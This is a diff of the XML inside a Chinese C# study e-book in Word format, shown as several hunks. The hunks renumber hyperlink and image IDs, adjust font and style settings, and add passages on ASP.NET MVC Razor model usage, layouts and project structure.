@@ -32280,7 +34451,7 @@
           <w:tab w:val="left" w:pos="3600"/>
         </w:tabs>
       </w:pPr>
-      <w:hyperlink r:id="rId45" w:history="1">
+      <w:hyperlink r:id="rId46" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -33956,7 +36127,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId46" cstate="print"/>
+                    <a:blip r:embed="rId47" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -34024,7 +36195,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId47" cstate="print"/>
+                    <a:blip r:embed="rId48" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -41297,7 +43468,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId48" cstate="print"/>
+                    <a:blip r:embed="rId49" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -41341,7 +43512,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId49" cstate="print"/>
+                    <a:blip r:embed="rId50" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -41418,7 +43589,7 @@
           <w:u w:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId50" w:history="1">
+      <w:hyperlink r:id="rId51" w:history="1">
         <w:r>
           <w:rPr>
             <w:color w:val="FF0000"/>
@@ -41483,7 +43654,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId51" cstate="print"/>
+                    <a:blip r:embed="rId52" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -41576,7 +43747,7 @@
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId52" w:history="1">
+      <w:hyperlink r:id="rId53" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -41644,7 +43815,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId53" cstate="print"/>
+                    <a:blip r:embed="rId54" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -41961,7 +44132,7 @@
         </w:rPr>
         <w:t>参考资料：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId54" w:history="1">
+      <w:hyperlink r:id="rId55" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -44172,7 +46343,7 @@
         </w:rPr>
         <w:t>参考资料：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId55" w:history="1">
+      <w:hyperlink r:id="rId56" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -44222,7 +46393,7 @@
         <w:tab/>
         <w:t xml:space="preserve">   </w:t>
       </w:r>
-      <w:hyperlink r:id="rId56" w:history="1">
+      <w:hyperlink r:id="rId57" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -44452,7 +46623,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId57" cstate="print"/>
+                    <a:blip r:embed="rId58" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -47420,7 +49591,7 @@
         </w:rPr>
         <w:t>3.帕斯卡(</w:t>
       </w:r>
-      <w:hyperlink r:id="rId58" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
+      <w:hyperlink r:id="rId59" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -51440,7 +53611,7 @@
         </w:rPr>
         <w:t>，网址：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId59" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
+      <w:hyperlink r:id="rId60" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -53024,7 +55195,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId60" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId61" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -53240,7 +55411,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId61" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId62" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -53985,7 +56156,7 @@
         </w:rPr>
         <w:t>好了，访问</w:t>
       </w:r>
-      <w:hyperlink r:id="rId62" w:history="1">
+      <w:hyperlink r:id="rId63" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -67335,8 +69506,8 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ad">
-    <w:name w:val="Normal"/>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
+    <w:name w:val="正文1"/>
     <w:basedOn w:val="a"/>
     <w:link w:val="Char3"/>
     <w:qFormat/>
@@ -67352,7 +69523,7 @@
   <w:style w:type="character" w:customStyle="1" w:styleId="Char3">
     <w:name w:val="正文 Char"/>
     <w:basedOn w:val="a0"/>
-    <w:link w:val="ad"/>
+    <w:link w:val="11"/>
     <w:rsid w:val="008C5997"/>
     <w:rPr>
       <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cstheme="minorBidi"/>
@@ -67641,7 +69812,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E7971578-912F-4C73-9692-51B57CE03486}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{ADCF8653-FD5F-4BC0-8668-92A6F1077D50}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -15661,7 +15661,7 @@
         <w:pStyle w:val="10"/>
         <w:spacing w:line="300" w:lineRule="exact"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
           <w:color w:val="000000"/>
           <w:kern w:val="0"/>
           <w:sz w:val="22"/>
@@ -15766,6 +15766,32 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:widowControl/>
         <w:numPr>
           <w:ilvl w:val="0"/>
@@ -16932,6 +16958,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>数据库服务端、客户端、图形界面管理工具、数据库语言（</w:t>
       </w:r>
       <w:r>
@@ -16992,7 +17019,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>数据库分库、拆表、分布式、集群、备份、故障调控等方案</w:t>
       </w:r>
     </w:p>
@@ -69812,7 +69838,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{ADCF8653-FD5F-4BC0-8668-92A6F1077D50}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{45349E71-CAD9-4E9E-9F3D-4263FB0CAFC4}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -13465,7 +13465,6 @@
         <w:pStyle w:val="10"/>
         <w:ind w:firstLine="420"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -13559,7 +13558,6 @@
         <w:pStyle w:val="10"/>
         <w:ind w:firstLine="420"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -13589,7 +13587,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
@@ -14138,10 +14135,113 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
           <w:b/>
           <w:color w:val="0070C0"/>
         </w:rPr>
+        <w:t>使用模型对象</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>在视图的第一行声明：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>@model</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 命名空间</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>这样我们就能在后面通过@Model调用对象的属性，字段，方法了例如：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>@Model</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>.Name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>//调用Name字段</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -14149,117 +14249,14 @@
           <w:b/>
           <w:color w:val="0070C0"/>
         </w:rPr>
-        <w:t>使用模型对象</w:t>
+        <w:t>使用布局</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>在视图的第一行声明：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>@model</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 命名空间</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>这样我们就能在后面通过@Model调用对象的属性，字段，方法了例如：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>@Model</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>.Name</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>//调用Name字段</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:b/>
-          <w:color w:val="0070C0"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:b/>
-          <w:color w:val="0070C0"/>
-        </w:rPr>
-        <w:t>使用布局</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -14292,7 +14289,7 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -14351,7 +14348,7 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -15456,21 +15453,21 @@
         <w:pStyle w:val="10"/>
         <w:spacing w:line="300" w:lineRule="exact"/>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun" w:hint="eastAsia"/>
-          <w:color w:val="0000FF"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="19"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
           <w:color w:val="0000FF"/>
           <w:kern w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="19"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
         <w:t>&lt;/</w:t>
       </w:r>
       <w:r>
@@ -15499,7 +15496,7 @@
         <w:pStyle w:val="10"/>
         <w:spacing w:line="300" w:lineRule="exact"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -15526,7 +15523,7 @@
         <w:pStyle w:val="10"/>
         <w:spacing w:line="300" w:lineRule="exact"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -15552,15 +15549,6 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:spacing w:line="300" w:lineRule="exact"/>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="19"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
           <w:color w:val="000000"/>
@@ -15568,6 +15556,15 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="19"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
         <w:t xml:space="preserve">Layout = </w:t>
       </w:r>
       <w:r>
@@ -15596,7 +15593,7 @@
         <w:pStyle w:val="10"/>
         <w:spacing w:line="300" w:lineRule="exact"/>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="NSimSun"/>
           <w:color w:val="000000"/>
           <w:kern w:val="0"/>
           <w:sz w:val="20"/>
@@ -15608,6 +15605,31 @@
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>但这里还有一个问题，就是必须要为每一个视图</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>指定布局文件。这意味着如果修改了布局视图的名称，就必须修改所有引用了该布局的视图。这是易错的过程，不符合</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
           <w:color w:val="000000"/>
@@ -15615,53 +15637,28 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>但这里还有一个问题，就是必须要为每一个视图</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>指定布局文件。这意味着如果修改了布局视图的名称，就必须修改所有引用了该布局的视图。这是易错的过程，不符合</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+        <w:t>MVC易于维护的主题。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="300" w:lineRule="exact"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
           <w:color w:val="000000"/>
           <w:kern w:val="0"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>MVC易于维护的主题。</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
         <w:spacing w:line="300" w:lineRule="exact"/>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="10"/>
-        <w:spacing w:line="300" w:lineRule="exact"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun" w:hint="eastAsia"/>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
           <w:color w:val="000000"/>
           <w:kern w:val="0"/>
           <w:sz w:val="22"/>
@@ -15780,6 +15777,1472 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="10"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="28"/>
+        </w:rPr>
+        <w:t>MVC项目综述</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>项目结构</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>约定</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a7"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2235"/>
+        <w:gridCol w:w="4886"/>
+        <w:gridCol w:w="3561"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2235" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="10"/>
+              <w:spacing w:line="300" w:lineRule="exact"/>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="NSimSun"/>
+                <w:color w:val="000000"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
